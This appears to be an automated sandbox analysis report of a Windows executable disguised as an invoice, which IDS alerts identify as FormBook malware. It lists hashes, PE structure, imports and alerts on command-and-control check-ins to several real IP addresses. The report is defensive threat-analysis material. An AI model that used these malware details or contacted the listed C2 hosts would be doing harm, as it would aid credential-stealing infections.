                                                                                  SHA-512:607F29EF9152C171622142ACAE6F40C914CFD06248CCFF416636E175903E499B0F595098EA1B44020CE28B8BC50808CD5A4A13EC05697778F0600D21E868C807
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...3V2CN5PVL..Q3.2CN1PVL.ZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVL.ZQ3[-.@1._.m.P....&X#v<>56A4_c-P>8#8z3Vu@6 .98l....8]'+.][FhZQ3U2CNHQ_.q:6.hR$..01.V...oR$.+...p:6.O...01..32[hR$.1PVLLZQ3.wCN}QWL.h.nU2CN1PVL.ZS2^3HN1.RLLZQ3U2CN.DVLLJQ3UBGN1P.LLJQ3U0CN7PVLLZQ3S2CN1PVLL*U3U0CN1PVLNZ..U2SN1@VLLZA3U"CN1PVL\ZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLb.4K!2CN..RLLJQ3U`GN1@VLLZQ3U2CN1PVLlZQSU2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3

                                                                                  C:\Users\user\AppData\Local\Temp\autC40D.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Invoice 10493.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):287744
                                                                                  Entropy (8bit):7.992853873619494
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:bmKu/0eU6rVi6PnZUS3pghjInSO4id/oakMqVVZJ:yRrlPuEahjIS1iOrrZJ
                                                                                  MD5:26AD12FC84F985D07D591CEA8FE255A9
                                                                                  SHA1:63FA7DB4CDC46FFFEC652C09C92D20604CAA471E
                                                                                  SHA-256:A29363B9594EFA63766D320C0763386902FA74E3D3AB0F9DABB69875AB70A25A
                                                                                  SHA-512:607F29EF9152C171622142ACAE6F40C914CFD06248CCFF416636E175903E499B0F595098EA1B44020CE28B8BC50808CD5A4A13EC05697778F0600D21E868C807
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...3V2CN5PVL..Q3.2CN1PVL.ZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVL.ZQ3[-.@1._.m.P....&X#v<>56A4_c-P>8#8z3Vu@6 .98l....8]'+.][FhZQ3U2CNHQ_.q:6.hR$..01.V...oR$.+...p:6.O...01..32[hR$.1PVLLZQ3.wCN}QWL.h.nU2CN1PVL.ZS2^3HN1.RLLZQ3U2CN.DVLLJQ3UBGN1P.LLJQ3U0CN7PVLLZQ3S2CN1PVLL*U3U0CN1PVLNZ..U2SN1@VLLZA3U"CN1PVL\ZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLb.4K!2CN..RLLJQ3U`GN1@VLLZQ3U2CN1PVLlZQSU2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3U2CN1PVLLZQ3

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.207723887899649
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Invoice 10493.exe
                                                                                  File size:1'225'216 bytes
                                                                                  MD5:ac2d5e685321a9ab4f14fc509d2618c0
                                                                                  SHA1:165b858be3340d458f5850bc8b24b6ed00cbf3e6
                                                                                  SHA256:3716beaffb80d0c1d3baa5ea20b767735f94a290e605ab6d3a4e264cf5efecd5
                                                                                  SHA512:8fefc39ce1016c69f8fd528b469547ee144c9677160db2458f89bac6c56bcd6658624b0df4b69527372ae32ad399fd8f9d70f95d857cdbca5946ab1ac305bda6
                                                                                  SSDEEP:24576:+u6J33O0c+JY5UZ+XC0kGso6FanA826xeh4N9qSfWzWY:Qu0c++OCvkGs9FanAh6x0E9BxY
                                                                                  TLSH:1245CF2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162262D7A3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x427dcd
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x67503CDB [Wed Dec 4 11:28:27 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FBD3C9D461Ah
                                                                                  jmp 00007FBD3C9C73E4h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FBD3C9C756Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FBD3C9C78CEh
                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                  jnc 00007FBD3C9C7569h
                                                                                  rep movsb
                                                                                  jmp 00007FBD3C9C787Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FBD3C9C7734h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FBD3C9C7570h
                                                                                  bt dword ptr [004BE324h], 01h
                                                                                  jc 00007FBD3C9C7A40h
                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                  jnc 00007FBD3C9C770Dh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FBD3C9C771Eh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FBD3C9C76FDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FBD3C9C756Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FBD3C9C7573h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FBD3C9C75C5h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FBD3C9C7618h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ASM] VS2013 build 21005
                                                                                  • [ C ] VS2013 build 21005
                                                                                  • [C++] VS2013 build 21005
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                  • [RES] VS2013 build 21005
                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x62854.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc70000x628540x62a005177dbb22b14e5d14ad4f9812c6bbe55False0.9329526101077313data7.906450878222093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcf7b80x59b19data1.000329354764076
                                                                                  RT_GROUP_ICON0x1292d40x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x12934c0x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x1293600x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x1293740x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x1293880xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x1294640x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-04T17:11:08.872127+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049710172.67.187.11480TCP
                                                                                  2024-12-04T17:11:08.872127+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049710172.67.187.11480TCP
                                                                                  2024-12-04T17:11:33.653882+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204971966.29.132.19480TCP
                                                                                  2024-12-04T17:11:36.369133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972066.29.132.19480TCP
                                                                                  2024-12-04T17:11:39.113549+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204972166.29.132.19480TCP
                                                                                  2024-12-04T17:11:41.810789+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204972266.29.132.19480TCP
                                                                                  2024-12-04T17:11:41.810789+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204972266.29.132.19480TCP
                                                                                  2024-12-04T17:11:48.259979+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049723202.92.5.2380TCP
                                                                                  2024-12-04T17:11:51.165066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049724202.92.5.2380TCP
                                                                                  2024-12-04T17:11:54.069218+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049725202.92.5.2380TCP
                                                                                  2024-12-04T17:11:56.971216+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049726202.92.5.2380TCP
                                                                                  2024-12-04T17:11:56.971216+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049726202.92.5.2380TCP
                                                                                  2024-12-04T17:12:02.505252+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049727194.195.220.4180TCP
                                                                                  2024-12-04T17:12:05.191161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049728194.195.220.4180TCP
                                                                                  2024-12-04T17:12:07.878639+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049729194.195.220.4180TCP
                                                                                  2024-12-04T17:12:10.565805+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049730194.195.220.4180TCP
                                                                                  2024-12-04T17:12:10.565805+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049730194.195.220.4180TCP
                                                                                  2024-12-04T17:12:16.857653+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049731103.230.159.8680TCP
                                                                                  2024-12-04T17:12:19.726532+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049732103.230.159.8680TCP
                                                                                  2024-12-04T17:12:22.602658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049733103.230.159.8680TCP
                                                                                  2024-12-04T17:12:25.474501+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049734103.230.159.8680TCP
                                                                                  2024-12-04T17:12:25.474501+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049734103.230.159.8680TCP
                                                                                  2024-12-04T17:12:31.171411+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049735172.67.180.24680TCP
